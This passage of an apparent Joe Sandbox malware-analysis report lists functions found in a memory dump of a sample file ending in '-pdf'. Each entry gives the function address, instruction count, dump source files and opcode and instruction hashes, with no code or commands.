                                                                                                                                                • Opcode ID: d813e5e55d0925d9df48117d19b71049c5dccc69aa3b51bc5e08095155f252b9
                                                                                                                                                • Instruction ID: 661d1e37d2258954c867dd5062e48cdd8fd8c2700a8885ac5885cd9545317692
                                                                                                                                                • Opcode Fuzzy Hash: d813e5e55d0925d9df48117d19b71049c5dccc69aa3b51bc5e08095155f252b9
                                                                                                                                                • Instruction Fuzzy Hash: 1F4121B66053029BD329DF28DC40B5BB7A4BF44390F100829F9959B290DB78FD41CBDA
                                                                                                                                                Function 32626074 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c3fadf1525c7bcd911a68a1ca2c1406e6ad841d5b2a3330af34e11e100981802
                                                                                                                                                • Instruction ID: c5638c9de978d0eb180baca0dd7956fc405cacea09c8e10705fbf59f3fa80b22
                                                                                                                                                • Opcode Fuzzy Hash: c3fadf1525c7bcd911a68a1ca2c1406e6ad841d5b2a3330af34e11e100981802
                                                                                                                                                • Instruction Fuzzy Hash: A15126749413229FDB29CB28CC05BE9B7B0FF05318F1082A9D515972D2EBB4A981CF85
                                                                                                                                                Function 3261B0D6 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 407d6f0e817db3479009dd47acb995162c0267260b1e020f51008a2cdcadb9ba
                                                                                                                                                • Instruction ID: d144e9d9122efd11720bf26267a63713154b7accff44a1af706feeacd7426f0c
                                                                                                                                                • Opcode Fuzzy Hash: 407d6f0e817db3479009dd47acb995162c0267260b1e020f51008a2cdcadb9ba
                                                                                                                                                • Instruction Fuzzy Hash: BC41FEB0641301EFE71ADF29D891B4AB7E8EF04B84F114469EA41DB6A0DBB0E940CB51
                                                                                                                                                Function 3264A390 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9979e94d7234a01d3b57ac8ef81cc8108659a264d639df358cd736e7cee6811b
                                                                                                                                                • Instruction ID: 6cd151ad70d69b8b3ae276056d29c5edf249ef323f7bc6544b9f904100bfbf20
                                                                                                                                                • Opcode Fuzzy Hash: 9979e94d7234a01d3b57ac8ef81cc8108659a264d639df358cd736e7cee6811b
                                                                                                                                                • Instruction Fuzzy Hash: 1441CA76941304EFDB0ACF68C9A1B9D77B4BF09368F480569D840BB291DF74AC41CBA5
                                                                                                                                                Function 3264D600 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 218f83f41f1b8043a4eeb19b79be5da61b20305dc830ce924d62b2dea12bec1f
                                                                                                                                                • Instruction ID: 1c979b14364e8a8a5148ef693f82d6c3582c265ca9790542ce6b106e5db747db
                                                                                                                                                • Opcode Fuzzy Hash: 218f83f41f1b8043a4eeb19b79be5da61b20305dc830ce924d62b2dea12bec1f
                                                                                                                                                • Instruction Fuzzy Hash: CE4123B1201340DFD324DF65C890E6AB7A8FF987A4F010A2EF9559B291CB71E851CBD6
                                                                                                                                                Function 32650630 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 115f0ca1e762c5ca0ab69c633fbfbeca290f491afa8b80bfe5ab1d04bb40af6c
                                                                                                                                                • Instruction ID: e3f6d31a2afe94ae1b7e3c0900d0c7703f81d79a1a231db240e755f687b1b05d
                                                                                                                                                • Opcode Fuzzy Hash: 115f0ca1e762c5ca0ab69c633fbfbeca290f491afa8b80bfe5ab1d04bb40af6c
                                                                                                                                                • Instruction Fuzzy Hash: 8A4147B5A00B15EFDB28CFA8C990A9AB7F4FF48704B20496DE556E7250DB30EA44CB50
                                                                                                                                                Function 326ED7A7 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 55c97e435bcbf64962ffe6f8771d89ea65ded8241ef7e5d58ad43e4dca84305a
                                                                                                                                                • Instruction ID: 7e3884772f9016ce86e8fead7fe01d075165af2533ad91e3b3f05250fd57aeac
                                                                                                                                                • Opcode Fuzzy Hash: 55c97e435bcbf64962ffe6f8771d89ea65ded8241ef7e5d58ad43e4dca84305a
                                                                                                                                                • Instruction Fuzzy Hash: 7F41DFB56063018BD319CF29CA80B1BB7E9EFC4B54F04452DE8A6C7392EB74D845CB92
                                                                                                                                                Function 3261C0F6 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7886d446083051ce7c55d9e9c2a94eda57875bcadb35949c8d67d6d09d4e484b
                                                                                                                                                • Instruction ID: c0642981d2b2381b23c2ca558152ab2103cca79e8cbe0de427a8fee47a1c8675
                                                                                                                                                • Opcode Fuzzy Hash: 7886d446083051ce7c55d9e9c2a94eda57875bcadb35949c8d67d6d09d4e484b
                                                                                                                                                • Instruction Fuzzy Hash: 7941E6B59003008FDB19DF28C881BA977B4BF41308F5484B9D949AF287DFB5B986CB95
                                                                                                                                                Function 326EBA66 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4cee8ed885ecaf7497e8b3b2f27516d2f11965ca40399471360bfd0588e13494
                                                                                                                                                • Instruction ID: e27c031c74d552759beddaccc7100dcbcd658713909a41ac1ea3b305dc069c72
                                                                                                                                                • Opcode Fuzzy Hash: 4cee8ed885ecaf7497e8b3b2f27516d2f11965ca40399471360bfd0588e13494
                                                                                                                                                • Instruction Fuzzy Hash: 0E315576703651BBD7168B68CA95F6A7BA8FF40784F044169E9438B384DFB4DC40C3A1
                                                                                                                                                Function 32651796 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 08834f4861dce98c3b0f73479e026df383c499d32d10d2dbe9e404d0954ee416
                                                                                                                                                • Instruction ID: 944f180c57572a0d3795ebbf1f993d2e37443e5d6073f450a15893b377d4f224
                                                                                                                                                • Opcode Fuzzy Hash: 08834f4861dce98c3b0f73479e026df383c499d32d10d2dbe9e404d0954ee416
                                                                                                                                                • Instruction Fuzzy Hash: 34417AB5A01305DFDB19CF59C880B99BBF1FF88B04F2485AAE914AB344CB34A941CB50
                                                                                                                                                Function 326A0227 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8e25b48ed2cd7fd116e59bf0d702721ed3dac1d23dcffa0380f57ca7ea2915cc
                                                                                                                                                • Instruction ID: c13bd2b1f67b60d5a415b463c68f109db5e558f13ff1aa88754ae56db068b3ec
                                                                                                                                                • Opcode Fuzzy Hash: 8e25b48ed2cd7fd116e59bf0d702721ed3dac1d23dcffa0380f57ca7ea2915cc
                                                                                                                                                • Instruction Fuzzy Hash: FC41A2B6609B429FC315CF68D890B6AB3E9FF88744F000619F855C7690EB70ED14C7AA
                                                                                                                                                Function 326301F1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b785a4ec1ea9d48df6b9859ed45b0cbd209ffbe141b2b1aa474e138aa9c4c81c
                                                                                                                                                • Instruction ID: cebe9cbe924f167f5046f7f21ae85b5b9bc1bed55272a5e659d94f18f39c9837
                                                                                                                                                • Opcode Fuzzy Hash: b785a4ec1ea9d48df6b9859ed45b0cbd209ffbe141b2b1aa474e138aa9c4c81c
                                                                                                                                                • Instruction Fuzzy Hash: 00313D35601744AFDB128BA8CC80B9EBBF9FF04350F044575E954D7362C6749948CBA5
                                                                                                                                                Function 32649194 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1fff781093c9bb4ee94fc2514c7fe2fd87b24a0f68384f371a319fcaee3958bc
                                                                                                                                                • Instruction ID: fc862206c53f66b2048ac4f027d1de36431908c2e9ef0232034ea50dbffb10cd
                                                                                                                                                • Opcode Fuzzy Hash: 1fff781093c9bb4ee94fc2514c7fe2fd87b24a0f68384f371a319fcaee3958bc
                                                                                                                                                • Instruction Fuzzy Hash: FA319176B45329AFDB258B24CC80F9B7BB5EF86714F000199A98CA7240CF709E84CF55
                                                                                                                                                Function 32624180 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f95492cbb3742d14006505a44dec36f0db806764c4ae6476bbf9775de0e85511
                                                                                                                                                • Instruction ID: 9cc91fdb8f0944883d6b3e082c6376884509415fea1fcc1b53a1f6dc271c14e7
                                                                                                                                                • Opcode Fuzzy Hash: f95492cbb3742d14006505a44dec36f0db806764c4ae6476bbf9775de0e85511
                                                                                                                                                • Instruction Fuzzy Hash: DA41DE71102B80DFD326CF24C990FD677E8EF48718F00882AE9599B250DBB5E804CFA0
                                                                                                                                                Function 326466E0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                                                                • Instruction ID: e6f4a867d5d589fda55891f9bc4006a089547bca07d632f0435a0b773614352b
                                                                                                                                                • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                                                                • Instruction Fuzzy Hash: BB41ABB6100A45DFC726CF14C980FAA7BE5FF84B50F504528E8498BAA0CF35EC02DB98
                                                                                                                                                Function 32645004 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                • Instruction ID: 4d7ddba16f19a97795c9081a1c6dafebbebdc1a386723a71c5266d3156d1a2f3
                                                                                                                                                • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                • Instruction Fuzzy Hash: 843125396083819FE715DA28C420B56B7D4AFA5B94F44852AF8C4CB291DE75D841C7E3
                                                                                                                                                Function 3269E79D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: fa04f238812eb77fb8d35cd1b7b6d1b894c7418938e3ff25edf63269dd6a4fab
                                                                                                                                                • Instruction ID: 31bbd62faae96def74e25462a099a6273a2efe6821fc76cc0b1a1d7b3b1a784a
                                                                                                                                                • Opcode Fuzzy Hash: fa04f238812eb77fb8d35cd1b7b6d1b894c7418938e3ff25edf63269dd6a4fab
                                                                                                                                                • Instruction Fuzzy Hash: 2A31F7B9741780EBE31747D4CA84FA977D8BF44B88F5904F2EA049B6E1DF68D840C296
                                                                                                                                                Function 3264EA40 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7f53f76b92a81cf4ab33b3991ceefbda516883f15c8fe63d28da8d134ef82d73
                                                                                                                                                • Instruction ID: b36b46c36482c7a2089d0fef5fc919ad1137f853e9251609294d4f98c8d7c624
                                                                                                                                                • Opcode Fuzzy Hash: 7f53f76b92a81cf4ab33b3991ceefbda516883f15c8fe63d28da8d134ef82d73
                                                                                                                                                • Instruction Fuzzy Hash: 6931CF76E01314AFD721DFA9C840A9EB7F8FF48790F11842AE955E7250DAB0DA40CBD5
                                                                                                                                                Function 326196E0 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: e6b4bc25127d6e6f0429a003c5db76a72a2410b008b5af3dab1593c12c5b404a
                                                                                                                                                • Instruction ID: ef15f0eb961cc1773f09e4b87396f7dc810b7a394fd6919b1f80e90f61d0d17e
                                                                                                                                                • Opcode Fuzzy Hash: e6b4bc25127d6e6f0429a003c5db76a72a2410b008b5af3dab1593c12c5b404a
                                                                                                                                                • Instruction Fuzzy Hash: DB21F276A02710AFD3269F58C840B5A7BB5FFC4B64F110829A656AB350DA70FD01CBD4
                                                                                                                                                Function 3261D64A Relevance: .1, Instructions: 93COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                                                • Instruction ID: 422836d7b8095307a1e88b3cc2c04a21213a5d93c43dc3305f86629b4477f934
                                                                                                                                                • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                                                • Instruction Fuzzy Hash: 4031D2BA600244AFEB15CE58CD90B5A73B9EF84798F218429ED089B252DA74FD40CB91
                                                                                                                                                Function 326F17BC Relevance: .1, Instructions: 91COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                                • Instruction ID: 579890b2e6d1dc827e9992651a1424033860317afbd19015b8b6bc4b57fcd647
                                                                                                                                                • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                                • Instruction Fuzzy Hash: AA31C1B2D00215EFCB04CF69C980AADB7F1FF58755F1581A9D868DB341D735AA11CBA0
                                                                                                                                                Function 326291E5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a8e7e9bbc2d3e814be9ef05f88494a56e2e254f1794695d2b90b389cb6249f7e
                                                                                                                                                • Instruction ID: 58f9e710beef0a99deb6de7068a0240b89f6da67c74ea35bee174d06ddbad643
                                                                                                                                                • Opcode Fuzzy Hash: a8e7e9bbc2d3e814be9ef05f88494a56e2e254f1794695d2b90b389cb6249f7e
                                                                                                                                                • Instruction Fuzzy Hash: BA3189B16093858FC70ACF18D880A8ABBE9FF89754F04056AFC5597360DA75DC14CBA6
                                                                                                                                                Function 3261E3C0 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e48521b9a6dec5f99d820d9c3c2290e1d018ede9d5162e63dcfa0f453a6e9bc7
                                                                                                                                                • Instruction ID: 7e812f7bb97bc4b84cdb917acd04c9dfc6dcb7b21b35d7116f25feae11fe94c2
                                                                                                                                                • Opcode Fuzzy Hash: e48521b9a6dec5f99d820d9c3c2290e1d018ede9d5162e63dcfa0f453a6e9bc7
                                                                                                                                                • Instruction Fuzzy Hash: A131D635A0062C9BE725CA14CC42FDE77B9AF19744F0100A1E645A7190CAB4FE81CFD5
                                                                                                                                                Function 326543D0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
